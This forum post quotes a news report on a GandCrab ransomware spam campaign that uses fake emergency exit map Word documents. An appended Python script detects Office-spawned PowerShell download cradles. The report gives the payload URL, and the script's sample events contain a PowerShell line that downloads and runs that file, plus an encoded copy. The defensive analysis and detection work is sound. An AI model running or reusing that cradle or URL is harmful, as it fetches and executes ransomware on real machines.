M.Poorya, Posted January 24, 2019

Quote:

A new malspam campaign pretending to be the current emergency exit map for the recipient's building is being used to install the GandCrab Ransomware. These spam emails contain malicious Word documents that download and install the infection from a remote computer. According to Myonlinesecurity.co.uk, who discovered this campaign, a server that was previously distributing the Ursnif banking Trojan has now started pushing GandCrab Ransomware v5.1.

BleepingComputer decided to take a look at the spam emails and the files being distributed so that you can see how this campaign works.

As previously stated, this latest malspam campaign is pretending to be updated emergency exit maps for the recipient's building. These emails state that they are coming from Rosie L. Ashton and have a subject of "Up to datе еmеrgеnсy еxit map". Attached to these spam emails is a Word document titled Emergencyexitmap.doc as shown below.

[Image: Malspam Email]

If the attachment is opened, the user will simply see a document with the text "Emergency exit map" and a prompt to enable content.

[Image: Malicious Word Document]

If the user clicks on the Enable Content button, the Word macros will execute a PowerShell script that downloads and installs the GandCrab v5.1 Ransomware onto the computer.

[Image: Obfuscated Macros]

As you can see below, this PowerShell script is obfuscated to make it more difficult to see exactly what is happening.

[Image: Obfuscated Word Macros]

When deobfuscated, you can see that the macros download a file called putty.exe from http://cameraista.com/olalala/putty.exe and save it to C:\Windows\temp\putty.exe. The putty.exe is then executed.

[Image: Deobfuscated PowerShell Script]

The putty.exe executable is GandCrab 5.1 and will begin to encrypt the files on your computer. Like earlier variants, GandCrab continues to encrypt files and then append a random extension to their file name.

[Image: Encrypted GandCrab 5.1 Files]

While encrypting your computer, it will also create ransom notes in every folder in which a file has been encrypted. These ransom notes indicate the v5.1 version of GandCrab and provide instructions on how to make a ransom payment.

[Image: GandCrab 5.1 Ransom Note]

Unfortunately, it is not possible to decrypt files encrypted by GandCrab, but you can still vaccinate a computer so that it will not be encrypted by the malware. To vaccinate your computer, you can download Valthek's GandCrab vaccine from https://29wspy.ru/reversing.html.

As always, never open an attachment you receive via email unless you confirm who it was sent from and that they meant to send it to you. It is also strongly suggested that you scan all attachments using VirusTotal before you open them in order to remain protected from malicious documents.

Source: https://www.bleepingcomputer.com/news/se...ansomware/
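The infection chain in the post above (Word macro, hidden PowerShell, download to C:\Windows\temp\putty.exe, execute) is a pattern that is easy to catch in process-creation telemetry even when the macro itself is obfuscated. The script below is an added example, not code from the BleepingComputer article or from the poster: it scores Sysmon Event ID 1 style records (ParentImage, Image, CommandLine) for an Office parent spawning a script host whose command line, plain or passed through -EncodedCommand, contains a download cradle and a temp-directory drop path. The sample events, the field names and the severity thresholds are constructed for the example; the URL and drop path in the first sample are the ones the article reports.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Download-cradle vocabulary common in macro-launched PowerShell one-liners.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|invoke-expression|\biex\b|https?://", re.IGNORECASE)
# Drop locations; the article's sample writes to C:\Windows\temp\putty.exe.
DROP_PATH_RE = re.compile(
    r"\\windows\\temp\\|\\appdata\\local\\temp\\|%temp%", re.IGNORECASE)
# -EncodedCommand (and its abbreviations) takes base64 of a UTF-16LE string.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                    re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of an -EncodedCommand argument, or '' if none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(event: dict) -> dict:
    """Score one process-creation event; returns a severity and the reasons."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    text = cmdline + " " + decoded  # match on both the raw and decoded forms

    reasons = []
    office_spawn = parent in OFFICE_PARENTS and image in SCRIPT_HOSTS
    if office_spawn:
        reasons.append(f"{parent} spawned {image}")
    if decoded:
        reasons.append("encoded PowerShell command")
    download = bool(DOWNLOAD_RE.search(text))
    if download:
        reasons.append("download cradle")
    drop = bool(DROP_PATH_RE.search(text))
    if drop:
        reasons.append("payload written to a temp directory")

    if office_spawn and (download or drop):
        severity = "high"
    elif office_spawn or (download and drop):
        severity = "medium"
    elif download or drop:
        severity = "low"
    else:
        severity = "none"
    return {"severity": severity, "reasons": reasons}


def scan(events):
    """Return (index, result) for every event scored above 'none'."""
    hits = []
    for i, event in enumerate(events):
        result = analyze(event)
        if result["severity"] != "none":
            hits.append((i, result))
    return hits


# Constructed sample events (not real telemetry). The first mirrors the macro
# behaviour described in the post; the second is the same cradle passed
# through -EncodedCommand; the last two are benign look-alikes.
CRADLE = ("(New-Object Net.WebClient).DownloadFile("
          "'http://cameraista.com/olalala/putty.exe','C:\\Windows\\temp\\putty.exe');"
          " Start-Process 'C:\\Windows\\temp\\putty.exe'")
ENC_PAYLOAD = base64.b64encode(CRADLE.encode("utf-16le")).decode()
WINWORD = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

SAMPLE_EVENTS = [
    {"ParentImage": WINWORD, "Image": PS,
     "CommandLine": f'powershell -w hidden -c "{CRADLE}"'},
    {"ParentImage": WINWORD, "Image": PS,
     "CommandLine": f"powershell -nop -w hidden -enc {ENC_PAYLOAD}"},
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell Get-ChildItem C:\\Users"},
    {"ParentImage": WINWORD, "Image": "C:\\Windows\\splwow64.exe",
     "CommandLine": "C:\\Windows\\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for index, result in scan(SAMPLE_EVENTS):
        print(index, result["severity"], "; ".join(result["reasons"]))
```

The decode step matters because the article's macro is obfuscated: a detection keyed only on the literal command line misses a cradle wrapped in -EncodedCommand, while one that scores parent/child relationship and drop path as well as the decoded text still fires. The benign samples show why the Office-parent condition is combined with a second signal rather than alerting on every Office child process.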
Reefa, Posted January 25, 2019

Again full content added...